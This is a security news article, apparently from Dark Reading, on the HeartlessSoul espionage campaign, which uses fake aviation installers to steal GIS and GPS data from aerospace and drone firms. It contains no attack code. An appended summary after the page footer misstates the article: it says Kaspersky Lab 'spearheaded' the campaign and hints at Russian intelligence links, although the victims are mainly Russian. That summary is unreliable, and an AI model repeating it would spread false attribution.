Cyber Espionage Group Targets Aviation Firms to Steal Map Data TechTarget and Informa Tech’s Digital Business Combine.TechTarget and InformaTechTarget and Informa Tech’s Digital Business Combine.Together, we power an unparalleled network of 220+ online properties covering 10,000+ granular topics, serving an audience of 50+ million professionals with original, objective content from trusted sources. We help you gain critical insights and make more informed decisions across your business priorities.Dark Reading Resource LibraryBlack Hat NewsOmdia CybersecurityAdvertiseNewsletter Sign-UpNewsletter Sign-UpCybersecurity TopicsRelated TopicsApplication SecurityCybersecurity CareersCloud SecurityCyber RiskCyberattacks & Data BreachesCybersecurity AnalyticsCybersecurity OperationsData PrivacyEndpoint SecurityICS/OT SecurityIdentity & Access Mgmt SecurityInsider ThreatsIoTMobile SecurityPerimeterPhysical SecurityRemote WorkforceThreat IntelligenceVulnerabilities & ThreatsRecent in Cybersecurity TopicsСloud SecurityHackers Use AI for Exploit Development, Attack AutomationHackers Use AI for Exploit Development, Attack AutomationbyAlexander CulafiMay 11, 20264 Min ReadСloud SecurityAfter Replacing TeamPCP Malware, 'PCPJack' Steals Cloud SecretsAfter Replacing TeamPCP Malware, 'PCPJack' Steals Cloud SecretsbyNate NelsonMay 7, 20265 Min ReadWorld Related TopicsDR GlobalMiddle East & AfricaAsia PacificLatin AmericaSee AllThe EdgeDR TechnologyEventsRelated TopicsUpcoming EventsPodcastsWebinarsSEE ALLResourcesRelated TopicsResource LibraryNewslettersPodcastsReportsVideosWebinarsWhite Papers Partner PerspectivesDark Reading Resource LibraryVulnerabilities & ThreatsCyber RiskCyberattacks & Data BreachesICS/OT SecurityNewsCyber Espionage Group Targets Aviation Firms to Steal Map DataThe campaign quietly compromises aerospace and drone operators to exfiltrate GIS files, terrain models, and GPS data and gain a clear picture of adversaries' world view.Robert Lemos,Contributing WriterMay 11, 20264 Min ReadSource: DC Studio via ShutterstockAs cyber operations continue to support regional conflicts, threat groups are targeting a wider range of information, including geospatial mapping and global positioning systems (GPS) data that can be used to locate enemy assets and gather information on a rival's own intelligence capabilities, cybersecurity firms warn.One cyber espionage group has used specially crafted phishing and malvertising campaigns to target aerospace firms and drone operators by creating domains and sites that host malware that appears to be installers for legitimate aviation software and resources, according to Kaspersky Lab. The group, dubbed HeartlessSoul, even planted a fake project on SourceForge, a legitimate download service, that resulted in the downloading of a malicious archive.The ultimate goal of the group appears to be collecting geospatial data and information from compromised systems, currently mainly belonging to the Russian government and enterprises, Kaspersky Lab tells Dark Reading.Related:Why Security Leadership Makes or Breaks a Pen Test"[T]his actor is a sophisticated one: combined multi-stage infection, fileless execution and the data the group targets, confirms that it is not just a hacktivist or criminal group, but a motivated group posing a serious threat to organizations," the cybersecurity firm said in its response.With several ongoing regional military conflicts and an increase in interference with global navigation satellite systems (GNSS), geospatial data has become a more common, if not popular, target for some threat groups. In 2024, for example, the cybercriminal hacker IntelBroker claimed to have breached Space-Eyes, a Miami-based geospatial intelligence firm, although analysts have cast doubt on some of the hacker's claimed exploits. IntelBroker, later identified as British national Kai West, was arrested in June 2025.The espionage campaigns show signs of sophistication and align with the concerns of nation-states, says Will Baxter, head of product for threat intelligence firm Team Cymru."The targeting of GIS, drone, and aviation data points to an intelligence-collection or defense-oriented angle, with downstream value across logistics disruption, infrastructure mapping, asset movement tracking, and operational planning," he says. "The most under-appreciated value in GIS theft is operational ground truth — the adversary gets to see exactly what the victim's own analysts believe about terrain, infrastructure, and routes, which lets them model gaps in the victim's own awareness."Hackers Steal Geospatial Files, Hidden CommandsRelated:How Dark Reading Lifted Off the Launchpad in 2006Once the attackers gain access to databases and workstations used for GIS analysis, HeartlessSoul downloads a variety of common document types, but also some rather uncommon types, including GPS data, Geographic Information System (GIS) shape files, digital geographic relief files, and some proprietary GIS mapping files, Kaspersky Lab stated in its report (in Russian)."Such GIS files ... allow you to obtain information about infrastructure — roads, engineering networks, terrain, as well as strategic objects, and provide confidential data in engineering, state and industrial organizations," the company stated (Google translated) in the analysis.The attackers used a variety of common techniques in their efforts to compromise systems, including a JavaScript remote access Trojan (RAT) and PowerShell scripts for executing common tasks. Some of the malicious LNK files used a Windows shortcut exploit (ZDI-CAN-25373), which has become popular in advanced persistent threat (APT) campaigns.Kaspersky Lab has monitored the group through compromised command-and-control infrastructure since at least February. The company traced the group's earliest activities back to at least September 2025.Attribution in Aviation Attacks Remains UncertainRelated:Another AI-Assisted Software Scan Yields 9-Year-Old Linux BugWhile no Western cybersecurity vendors have identified a group that matches HeartlessSoul, two other Russian cybersecurity firms — Positive Technologies and BI.ZONE — have documented the threat group, with the latter naming the group Versatile Werewolf. Two other threat groups, Paper Werewolf and Eagle Werewolf, also target drone-focused forums and chat channels, such as Telegram, as well as Russian citizens seeking to bypass restrictions on Starlink devices, according to a BI.ZONE analysis.None of the three companies have publicly attributed the attacks. Paper Werewolf, also known as GOFFEE, appears to link to pro-Ukrainian groups, which initially targeted Russian defense contractors. BI.ZONE noted that the three groups, while given similar names and have adopted similar techniques, appear to be operating autonomously.Defenders should focus on mounting a practical response, hunting for signs of the attackers, and find operational-security failures, Baxter says.Additionally, companies and agencies that use GIS data should protect their crown jewels, focusing on putting specific assets such as flight-planning software behind zero-trust security measures like identity-bound access with egress monitoring, and segmenting engineering networks from general business networks, he says.The business will benefits from reducing operation risk for the most critical systems, without forcing non-critical environments to bear the burden of zero trust for no significant benefit. "It's an asymmetric investment in the small set of workstations that touch crown-jewel data," Baxter says. "Most businesses need flexibility and scale, and a textbook zero-trust posture on every drone-operator or field workstation isn't realistic."Don't miss the latest Dark Reading Confidential podcast, How the Story of a USB Penetration Test Went Viral. Two decades ago Dark Reading posted its first blockbuster piece — a column by a pen tester who sprinkled rigged thumb drives around a credit union parking lot and let curious employees do the rest. This episode looks back at the history-making piece with its author, Steve Stasiukonis. Listen now!About the AuthorRobert LemosContributing WriterVeteran technology journalist of more than 20 years. Former research engineer. Written for more than two dozen publications, including CNET News.com, Dark Reading, MIT's Technology Review, Popular Science, and Wired News. Five awards for journalism, including Best Deadline Journalism (Online) in 2003 for coverage of the Blaster worm. Crunches numbers on various trends using Python and R. Recent reports include analyses of the shortage in cybersecurity workers and annual vulnerability trends.See more from Robert LemosWant more Dark Reading stories in your Google search results?Add Us NowMore InsightsIndustry ReportsHow Enterprises Are Developing Secure ApplicationsInside RSAC 2026: security leaders reveal the risks redefining your defense strategyHow Enterprises Are Harnessing Emerging Technologies in CybersecurityDitch the Data Center: Understanding Flexible Cloud Infrastructure Security Management2025 State of MalwareAccess More ResearchWebinarsThe New Attack Surface: How Attackers Are Exploiting OAuth to Own Your Cloud WorkspacePrompt Injection Is Just the Start: Securing LLMs in AI SystemsAnatomy of a Data Breach: What to Do if it Happens to YouHow Well Can You See What's in Your Cloud?Implementing CTEM: Beyond Vulnerability ManagementMore WebinarsEditor's ChoiceThreat IntelligenceFrom Stuxnet to ChatGPT: 20 News Events That Shaped CyberFrom Stuxnet to ChatGPT: 20 News Events That Shaped CyberbyDark Reading Editorial TeamMay 6, 202631 Min ReadCyber RiskPhysical Cargo Theft Gets a Boost From CybercriminalsPhysical Cargo Theft Gets a Boost From CybercriminalsbyRobert LemosMay 4, 20265 Min ReadWant more Dark Reading stories in your Google search results?Keep up with the latest cybersecurity threats, newly discovered vulnerabilities, data breach information, and emerging trends. Delivered daily or weekly right to your email inbox.SubscribeRSAC 2026: key news & insightsAt RSAC 2026, Dark Reading captured critical intelligence on AI, new attack methods, geopolitics, and much moreGet Your RecapWebinarsThe New Attack Surface: How Attackers Are Exploiting OAuth to Own Your Cloud WorkspaceWed, June 24,2026 at 1pm ESTPrompt Injection Is Just the Start: Securing LLMs in AI SystemsTues, May 26, 2026, at 1pm ESTAnatomy of a Data Breach: What to Do if it Happens to YouJune 18th, 2026 | 11:00am -5:00pm ET | Doors Open at 10:30am ETHow Well Can You See What's in Your Cloud?Thurs, June 4, 2026 at 1:00pm ESTImplementing CTEM: Beyond Vulnerability ManagementThurs, May 21, 2026 at 1pm ESTMore WebinarsBlack Hat USA | Mandalay Bay, Las VegasThe premier cybersecurity event of the year returns to Mandalay Bay with a re‑engineered, six‑day program built to ignite innovation, push boundaries, and bring the global security community together like never before. Use code: DARKREADING to save $200 on a Briefings pass or $100 on a Business pass.GET YOUR PASSDiscover MoreBlack HatOmdiaWorking With UsAbout UsAdvertiseReprintsJoin UsNewsletter Sign-UpFollow UsCopyright © 2026 TechTarget, Inc. d/b/a Informa TechTarget. This website is owned and operated by Informa TechTarget, part of a global network that informs, influences and connects the world’s technology buyers and sellers. All copyright resides with them. Informa PLC’s registered office is 5 Howick Place, London SW1P 1WG. Registered in England and Wales. TechTarget, Inc.’s registered office is 275 Grove St. Newton, MA 02466.Home|Cookie Policy|Privacy|Terms of UseYour Privacy Choices

This report details a cyber espionage campaign targeting aviation firms and drone operators, orchestrated by a group identified as HeartlessSoul, with potential connections to Russian intelligence. The campaign, spearheaded by Kaspersky Lab, leverages phishing and malvertising tactics to deploy malware disguised as legitimate aviation software installers. The group’s objective appears to be the acquisition of geospatial data, including GIS files, terrain models, and GPS data, which is particularly valuable in ongoing regional conflicts and for gaining a strategic intelligence advantage. HeartlessSoul employs multi-stage infection techniques—combining fileless execution and targeted data exfiltration—indicating a sophisticated operational profile beyond typical hacktivist or criminal activity. The stolen data encompasses a broad range of files, notably including GPS data and GIS shape files, allowing adversaries to map infrastructure, strategic assets, and operational routes. Several other Russian cybersecurity firms, including Positive Technologies and BI.ZONE, have independently documented this threat group, frequently referencing it as Versatile Werewolf or similar variants. The motivations behind this espionage extend beyond immediate tactical goals, aligning with nation-state interests in intelligence collection and defense operations. Analysts, such as Will Baxter from Team Cymru, emphasize the strategic value of geospatial data—providing operational ground truth that can inform adversary modeling. Defenders are urged to implement robust security measures, including zero-trust access controls, network segmentation, and proactive hunting for malicious activity, particularly focusing on critical systems handling geographical information and flight planning software. The sophistication of the HeartlessSoul group highlights the increasing convergence of cyber espionage and geopolitical tensions, underscoring the need for heightened vigilance and a layered defense strategy to protect sensitive geospatial assets.